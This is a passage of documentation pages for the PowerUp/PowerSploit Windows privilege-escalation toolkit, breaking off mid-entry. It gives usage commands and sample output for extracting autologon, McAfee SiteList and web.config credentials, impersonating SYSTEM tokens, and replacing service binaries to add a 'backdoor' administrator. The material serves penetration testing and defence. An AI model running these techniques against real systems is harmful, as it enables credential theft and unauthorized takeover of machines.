    "content": "# Get-ProcessTokenGroup\r\n\r\n## SYNOPSIS\r\nReturns all SIDs that the current token context is a part of, whether they are disabled or not.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect, Get-TokenInformation\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-ProcessTokenGroup [[-Id] <UInt32>]\r\n```\r\n\r\n## DESCRIPTION\r\nFirst, if a process ID is passed, then the process is opened using OpenProcess(),\r\notherwise GetCurrentProcess() is used to open up a pseudohandle to the current process.\r\nOpenProcessToken() is then used to get a handle to the specified process token.\r\nThe token\r\nis then passed to Get-TokenInformation to query the current token groups for the specified\r\ntoken.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-ProcessTokenGroup\r\n```\r\n\r\nSID                                              Attributes                     ProcessId\r\n---                                              ----------                     ---------\r\nS-1-5-21-890171859-3433809...\r\n..._DEFAULT, SE_GROUP_ENABLED                          1372\r\nS-1-1-0                       ..._DEFAULT, SE_GROUP_ENABLED                          1372\r\nS-1-5-32-544                     SE_GROUP_USE_FOR_DENY_ONLY                          1372\r\nS-1-5-32-545                  ..._DEFAULT, SE_GROUP_ENABLED                          1372\r\nS-1-5-4                       ..._DEFAULT, SE_GROUP_ENABLED                          1372\r\nS-1-2-1                       ..._DEFAULT, SE_GROUP_ENABLED                          1372\r\nS-1-5-11                      ..._DEFAULT, SE_GROUP_ENABLED                          1372\r\nS-1-5-15                      ..._DEFAULT, SE_GROUP_ENABLED                          1372\r\nS-1-5-5-0-419601              ...SE_GROUP_INTEGRITY_ENABLED                          1372\r\nS-1-2-0                       ..._DEFAULT, SE_GROUP_ENABLED                          1372\r\nS-1-5-21-890171859-3433809...\r\n..._DEFAULT, SE_GROUP_ENABLED                          1372\r\nS-1-5-21-890171859-3433809...\r\n..._DEFAULT, SE_GROUP_ENABLED                          1372\r\nS-1-5-21-890171859-3433809...\r\n..._DEFAULT, SE_GROUP_ENABLED                          1372\r\nS-1-18-1                      ..._DEFAULT, SE_GROUP_ENABLED                          1372\r\nS-1-16-8192                                                                          1372\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-Process notepad | Get-ProcessTokenGroup\r\n```\r\n\r\nSID                                              Attributes                     ProcessId\r\n---                                              ----------                     ---------\r\nS-1-5-21-890171859-3433809...\r\n..._DEFAULT, SE_GROUP_ENABLED                          2640\r\nS-1-1-0                       ..._DEFAULT, SE_GROUP_ENABLED                          2640\r\nS-1-5-32-544                     SE_GROUP_USE_FOR_DENY_ONLY                          2640\r\nS-1-5-32-545                  ..._DEFAULT, SE_GROUP_ENABLED                          2640\r\nS-1-5-4                       ..._DEFAULT, SE_GROUP_ENABLED                          2640\r\nS-1-2-1                       ..._DEFAULT, SE_GROUP_ENABLED                          2640\r\nS-1-5-11                      ..._DEFAULT, SE_GROUP_ENABLED                          2640\r\nS-1-5-15                      ..._DEFAULT, SE_GROUP_ENABLED                          2640\r\nS-1-5-5-0-419601              ...SE_GROUP_INTEGRITY_ENABLED                          2640\r\nS-1-2-0                       ..._DEFAULT, SE_GROUP_ENABLED                          2640\r\nS-1-5-21-890171859-3433809...\r\n..._DEFAULT, SE_GROUP_ENABLED                          2640\r\nS-1-5-21-890171859-3433809...\r\n..._DEFAULT, SE_GROUP_ENABLED                          2640\r\nS-1-5-21-890171859-3433809...\r\n..._DEFAULT, SE_GROUP_ENABLED                          2640\r\nS-1-18-1                      ..._DEFAULT, SE_GROUP_ENABLED                          2640\r\nS-1-16-8192                                                                          2640\r\n\r\n## PARAMETERS\r\n\r\n### -Id\r\nThe process ID to enumerate token groups for, otherwise defaults to the current process.\r\n\r\n```yaml\r\nType: UInt32\r\nParameter Sets: (All)\r\nAliases: ProcessID\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: 0\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.TokenGroup\r\n\r\nOutputs a custom object containing the token group (SID/attributes) for the specified token if\r\n\"-InformationClass 'Groups'\" is passed.\r\n\r\nPowerUp.TokenPrivilege\r\n\r\nOutputs a custom object containing the token privilege (name/attributes) for the specified token if\r\n\"-InformationClass 'Privileges'\" is passed\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-ProcessTokenPrivilege.md",
    "content": "# Get-ProcessTokenPrivilege\r\n\r\n## SYNOPSIS\r\nReturns all privileges for the current (or specified) process ID.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect, Get-TokenInformation\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-ProcessTokenPrivilege [[-Id] <UInt32>] [-Special]\r\n```\r\n\r\n## DESCRIPTION\r\nFirst, if a process ID is passed, then the process is opened using OpenProcess(),\r\notherwise GetCurrentProcess() is used to open up a pseudohandle to the current process.\r\nOpenProcessToken() is then used to get a handle to the specified process token.\r\nThe token\r\nis then passed to Get-TokenInformation to query the current privileges for the specified\r\ntoken.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-ProcessTokenPrivilege\r\n```\r\n\r\nPrivilege                    Attributes                     ProcessId\r\n                    ---------                    ----------                     ---------\r\n          SeShutdownPrivilege                      DISABLED                          2600\r\n      SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED                          2600\r\n            SeUndockPrivilege                      DISABLED                          2600\r\nSeIncreaseWorkingSetPrivilege                      DISABLED                          2600\r\n          SeTimeZonePrivilege                      DISABLED                          2600\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-ProcessTokenPrivilege -Special\r\n```\r\n\r\nPrivilege                                  Attributes                 ProcessId\r\n---------                                  ----------                 ---------\r\nSeSecurityPrivilege                          DISABLED                      2444\r\nSeTakeOwnershipPrivilege                     DISABLED                      2444\r\nSeBackupPrivilege                            DISABLED                      2444\r\nSeRestorePrivilege                           DISABLED                      2444\r\nSeSystemEnvironmentPriv... \r\nDISABLED                      2444\r\nSeImpersonatePrivilege     ...T, SE_PRIVILEGE_ENABLED                      2444\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-Process notepad | Get-ProcessTokenPrivilege | fl\r\n```\r\n\r\nPrivilege  : SeShutdownPrivilege\r\nAttributes : DISABLED\r\nProcessId  : 2640\r\n\r\nPrivilege  : SeChangeNotifyPrivilege\r\nAttributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED\r\nProcessId  : 2640\r\n\r\nPrivilege  : SeUndockPrivilege\r\nAttributes : DISABLED\r\nProcessId  : 2640\r\n\r\nPrivilege  : SeIncreaseWorkingSetPrivilege\r\nAttributes : DISABLED\r\nProcessId  : 2640\r\n\r\nPrivilege  : SeTimeZonePrivilege\r\nAttributes : DISABLED\r\nProcessId  : 2640\r\n\r\n## PARAMETERS\r\n\r\n### -Id\r\nThe process ID to enumerate token groups for, otherwise defaults to the current process.\r\n\r\n```yaml\r\nType: UInt32\r\nParameter Sets: (All)\r\nAliases: ProcessID\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: 0\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Special\r\nSwitch.\r\nOnly return 'special' privileges, meaning admin-level privileges.\r\nThese include SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege,\r\nSeRestorePrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeTcbPrivilege.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: Privileged\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.TokenGroup\r\n\r\nOutputs a custom object containing the token group (SID/attributes) for the specified token if\r\n\"-InformationClass 'Groups'\" is passed.\r\n\r\nPowerUp.TokenPrivilege\r\n\r\nOutputs a custom object containing the token privilege (name/attributes) for the specified token if\r\n\"-InformationClass 'Privileges'\" is passed\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-RegistryAlwaysInstallElevated.md",
    "content": "# Get-RegistryAlwaysInstallElevated\r\n\r\n## SYNOPSIS\r\nChecks if any of the AlwaysInstallElevated registry keys are set.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-RegistryAlwaysInstallElevated\r\n```\r\n\r\n## DESCRIPTION\r\nReturns $True if the HKLM:SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated\r\nor the HKCU:SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated keys\r\nare set, $False otherwise.\r\nIf one of these keys are set, then all .MSI files run with\r\nelevated permissions, regardless of current user permissions.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-RegistryAlwaysInstallElevated\r\n```\r\n\r\nReturns $True if any of the AlwaysInstallElevated registry keys are set.\r\n\r\n## PARAMETERS\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### System.Boolean\r\n\r\n$True if RegistryAlwaysInstallElevated is set, $False otherwise.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-RegistryAutoLogon.md",
    "content": "# Get-RegistryAutoLogon\r\n\r\n## SYNOPSIS\r\nFinds any autologon credentials left in the registry.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-RegistryAutoLogon\r\n```\r\n\r\n## DESCRIPTION\r\nChecks if any autologon accounts/credentials are set in a number of registry locations.\r\nIf they are, the credentials are extracted and returned as a custom PSObject.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-RegistryAutoLogon\r\n```\r\n\r\nFinds any autologon credentials left in the registry.\r\n\r\n## PARAMETERS\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.RegistryAutoLogon\r\n\r\nCustom PSObject containing autologin credentials found in the registry.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-ServiceDetail.md",
    "content": "# Get-ServiceDetail\r\n\r\n## SYNOPSIS\r\nReturns detailed information about a specified service by querying the\r\nWMI win32_service class for the specified service name.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-ServiceDetail [-Name] <String[]>\r\n```\r\n\r\n## DESCRIPTION\r\nTakes an array of one or more service Names or ServiceProcess.ServiceController objedts on\r\nthe pipeline object returned by Get-Service, extracts out the service name, queries the\r\nWMI win32_service class for the specified service for details like binPath, and outputs\r\neverything.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-ServiceDetail -Name VulnSVC\r\n```\r\n\r\nGets detailed information about the 'VulnSVC' service.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-Service VulnSVC | Get-ServiceDetail\r\n```\r\n\r\nGets detailed information about the 'VulnSVC' service.\r\n\r\n## PARAMETERS\r\n\r\n### -Name\r\nAn array of one or more service names to query information for.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: ServiceName\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### System.Management.ManagementObject\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-SiteListPassword.md",
    "content": "# Get-SiteListPassword\r\n\r\n## SYNOPSIS\r\nRetrieves the plaintext passwords for found McAfee's SiteList.xml files.\r\nBased on Jerome Nokin (@funoverip)'s Python solution (in links).\r\n\r\nAuthor: Jerome Nokin (@funoverip)  \r\nPowerShell Port: @harmj0y  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-SiteListPassword [[-Path] <String[]>]\r\n```\r\n\r\n## DESCRIPTION\r\nSearches for any McAfee SiteList.xml in C:\\Program Files\\, C:\\Program Files (x86)\\,\r\nC:\\Documents and Settings\\, or C:\\Users\\.\r\nFor any files found, the appropriate\r\ncredential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword\r\nfunction that takes advantage of McAfee's static key encryption.\r\nAny decrypted credentials\r\nare output in custom objects.\r\nSee links for more information.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-SiteListPassword\r\n```\r\n\r\nEncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==\r\nUserName    :\r\nPath        : Products/CommonUpdater\r\nName        : McAfeeHttp\r\nDecPassword : MyStrongPassword!\r\nEnabled     : 1\r\nDomainName  :\r\nServer      : update.nai.com:80\r\n\r\nEncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==\r\nUserName    : McAfeeService\r\nPath        : Repository$\r\nName        : Paris\r\nDecPassword : MyStrongPassword!\r\nEnabled     : 1\r\nDomainName  : companydomain\r\nServer      : paris001\r\n\r\nEncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==\r\nUserName    : McAfeeService\r\nPath        : Repository$\r\nName        : Tokyo\r\nDecPassword : MyStrongPassword!\r\nEnabled     : 1\r\nDomainName  : companydomain\r\nServer      : tokyo000\r\n\r\n## PARAMETERS\r\n\r\n### -Path\r\nOptional path to a SiteList.xml file or folder.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.SiteListPassword\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[https://github.com/funoverip/mcafee-sitelist-pwd-decryption/\r\nhttps://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/\r\nhttps://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md\r\nhttps://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf](https://github.com/funoverip/mcafee-sitelist-pwd-decryption/\r\nhttps://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/\r\nhttps://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md\r\nhttps://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-System.md",
    "content": "# Get-System\r\n\r\n## SYNOPSIS\r\nGetSystem functionality inspired by Meterpreter's getsystem.\r\n'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create\r\na service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege.\r\nNOTE: if running PowerShell 2.0, start powershell.exe with '-STA' to ensure\r\ntoken duplication works correctly.\r\n\r\nPowerSploit Function: Get-System\r\nAuthor: @harmj0y, @mattifestation\r\nLicense: BSD 3-Clause\r\nRequired Dependencies: None\r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n### NamedPipe (Default)\r\n```\r\nGet-System [-Technique <String>] [-ServiceName <String>] [-PipeName <String>]\r\n```\r\n\r\n### Token\r\n```\r\nGet-System [-Technique <String>]\r\n```\r\n\r\n### RevToSelf\r\n```\r\nGet-System [-RevToSelf]\r\n```\r\n\r\n### WhoAmI\r\n```\r\nGet-System [-WhoAmI]\r\n```\r\n\r\n## DESCRIPTION\r\n{{Fill in the Description}}\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-System\r\n```\r\n\r\nUses named impersonate to elevate the current thread token to SYSTEM.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-System -ServiceName 'PrivescSvc' -PipeName 'secret'\r\n```\r\n\r\nUses named impersonate to elevate the current thread token to SYSTEM\r\nwith a custom service and pipe name.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-System -Technique Token\r\n```\r\n\r\nUses token duplication to elevate the current thread token to SYSTEM.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\nGet-System -WhoAmI\r\n```\r\n\r\nDisplays the credentials for the current thread.\r\n\r\n### -------------------------- EXAMPLE 5 --------------------------\r\n```\r\nGet-System -RevToSelf\r\n```\r\n\r\nReverts the current thread privileges.\r\n\r\n## PARAMETERS\r\n\r\n### -Technique\r\nThe technique to use, 'NamedPipe' or 'Token'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: NamedPipe, Token\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: NamedPipe\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServiceName\r\nThe name of the service used with named pipe impersonation, defaults to 'TestSVC'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: NamedPipe\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: TestSVC\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -PipeName\r\nThe name of the named pipe used with named pipe impersonation, defaults to 'TestSVC'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: NamedPipe\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: TestSVC\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -RevToSelf\r\nReverts the current thread privileges.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: RevToSelf\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -WhoAmI\r\nSwitch.\r\nDisplay the credentials for the current PowerShell thread.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: WhoAmI\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c\r\nhttps://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot\r\nhttp://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/\r\nhttp://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/](https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c\r\nhttps://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot\r\nhttp://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/\r\nhttp://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-UnattendedInstallFile.md",
    "content": "# Get-UnattendedInstallFile\r\n\r\n## SYNOPSIS\r\nChecks several locations for remaining unattended installation files,\r\nwhich may have deployment credentials.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-UnattendedInstallFile\r\n```\r\n\r\n## DESCRIPTION\r\n{{Fill in the Description}}\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-UnattendedInstallFile\r\n```\r\n\r\nFinds any remaining unattended installation files.\r\n\r\n## PARAMETERS\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.UnattendedInstallFile\r\n\r\nCustom PSObject containing results.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-UnquotedService.md",
    "content": "# Get-UnquotedService\r\n\r\n## SYNOPSIS\r\nGet-UnquotedService Returns the name and binary path for services with unquoted paths\r\nthat also have a space in the name.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-UnquotedService\r\n```\r\n\r\n## DESCRIPTION\r\nUses Get-WmiObject to query all win32_service objects and extract out\r\nthe binary pathname for each.\r\nThen checks if any binary paths have a space\r\nand aren't quoted.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-UnquotedService\r\n```\r\n\r\nGet a set of potentially exploitable services.\r\n\r\n## PARAMETERS\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.UnquotedService\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-WebConfig.md",
    "content": "# Get-WebConfig\r\n\r\n## SYNOPSIS\r\nThis script will recover cleartext and encrypted connection strings from all web.config\r\nfiles on the system.\r\nAlso, it will decrypt them if needed.\r\n\r\nAuthor: Scott Sutherland, Antti Rantasaari  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-WebConfig\r\n```\r\n\r\n## DESCRIPTION\r\nThis script will identify all of the web.config files on the system and recover the\r\nconnection strings used to support authentication to backend databases. \r\nIf needed, the\r\nscript will also decrypt the connection strings on the fly. \r\nThe output supports the\r\npipeline which can be used to convert all of the results into a pretty table by piping\r\nto format-table.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nReturn a list of cleartext and decrypted connect strings from web.config files.\r\n```\r\n\r\nGet-WebConfig\r\n\r\nuser   : s1admin\r\npass   : s1password\r\ndbserv : 192.168.1.103\\server1\r\nvdir   : C:\\test2\r\npath   : C:\\test2\\web.config\r\nencr   : No\r\n\r\nuser   : s1user\r\npass   : s1password\r\ndbserv : 192.168.1.103\\server1\r\nvdir   : C:\\inetpub\\wwwroot\r\npath   : C:\\inetpub\\wwwroot\\web.config\r\nencr   : Yes\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nReturn a list of clear text and decrypted connect strings from web.config files.\r\n```\r\n\r\nGet-WebConfig | Format-Table -Autosize\r\n\r\nuser    pass       dbserv                vdir               path                          encr\r\n----    ----       ------                ----               ----                          ----\r\ns1admin s1password 192.168.1.101\\server1 C:\\App1            C:\\App1\\web.config            No\r\ns1user  s1password 192.168.1.101\\server1 C:\\inetpub\\wwwroot C:\\inetpub\\wwwroot\\web.config No\r\ns2user  s2password 192.168.1.102\\server2 C:\\App2            C:\\App2\\test\\web.config       No\r\ns2user  s2password 192.168.1.102\\server2 C:\\App2            C:\\App2\\web.config            Yes\r\ns3user  s3password 192.168.1.103\\server3 D:\\App3            D:\\App3\\web.config            No\r\n\r\n## PARAMETERS\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### System.Boolean\r\n\r\nSystem.Data.DataTable\r\n\r\n## NOTES\r\nBelow is an alterantive method for grabbing connection strings, but it doesn't support decryption.\r\nfor /f \"tokens=*\" %i in ('%systemroot%\\system32\\inetsrv\\appcmd.exe list sites /text:name') do %systemroot%\\system32\\inetsrv\\appcmd.exe list config \"%i\" -section:connectionstrings\r\n\r\nAuthor: Scott Sutherland - 2014, NetSPI\r\nAuthor: Antti Rantasaari - 2014, NetSPI\r\n\r\n## RELATED LINKS\r\n\r\n[https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1\r\nhttp://www.netspi.com\r\nhttps://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx\r\nhttp://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe\r\nhttp://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1\r\nhttp://www.netspi.com\r\nhttps://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx\r\nhttp://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe\r\nhttp://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Install-ServiceBinary.md",
    "content": "# Install-ServiceBinary\r\n\r\n## SYNOPSIS\r\nReplaces the service binary for the specified service with one that executes\r\na specified command as SYSTEM.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary\r\n\r\n## SYNTAX\r\n\r\n```\r\nInstall-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>]\r\n [-Credential <PSCredential>] [-Command <String>]\r\n```\r\n\r\n## DESCRIPTION\r\nTakes a esrvice Name or a ServiceProcess.ServiceController on the pipeline where the\r\ncurrent user can  modify the associated service binary listed in the binPath.\r\nBacks up\r\nthe original service binary to \"OriginalService.exe.bak\" in service binary location,\r\nand then uses Write-ServiceBinary to create a C# service binary that either adds\r\na local administrator user or executes a custom command.\r\nThe new service binary is\r\nreplaced in the original service binary path, and a custom object is returned that\r\ncaptures the original and new service binary configuration.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nInstall-ServiceBinary -Name VulnSVC\r\n```\r\n\r\nBacks up the original service binary to SERVICE_PATH.exe.bak and replaces the binary\r\nfor VulnSVC with one that adds a local Administrator (john/Password123!).\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-Service VulnSVC | Install-ServiceBinary\r\n```\r\n\r\nBacks up the original service binary to SERVICE_PATH.exe.bak and replaces the binary\r\nfor VulnSVC with one that adds a local Administrator (john/Password123!).\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nInstall-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\\john'\r\n```\r\n\r\nBacks up the original service binary to SERVICE_PATH.exe.bak and replaces the binary\r\nfor VulnSVC with one that adds TESTLAB\\john to the Administrators local group.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\nInstall-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!\r\n```\r\n\r\nBacks up the original service binary to SERVICE_PATH.exe.bak and replaces the binary\r\nfor VulnSVC with one that adds a local Administrator (backdoor/Password123!).\r\n\r\n### -------------------------- EXAMPLE 5 --------------------------\r\n```\r\nInstall-ServiceBinary -Name VulnSVC -Command \"net ...\"\r\n```\r\n\r\nBacks up the original service binary to SERVICE_PATH.exe.bak and replaces the binary\r\nfor VulnSVC with one that executes a custom command.\r\n\r\n## PARAMETERS\r\n\r\n### -Name\r\nThe service name the EXE will be running under.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ServiceName\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserName\r\nThe \\[domain\\\\\\]username to add.\r\nIf not given, it defaults to \"john\".\r\nDomain users are not created, only added to the specified localgroup.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: John\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Password\r\nThe password to set for the added user.\r\nIf not given, it defaults to \"Password123!\"\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Password123!\r\nAccept pipeline input: False\r\nAccept wildcard characters: 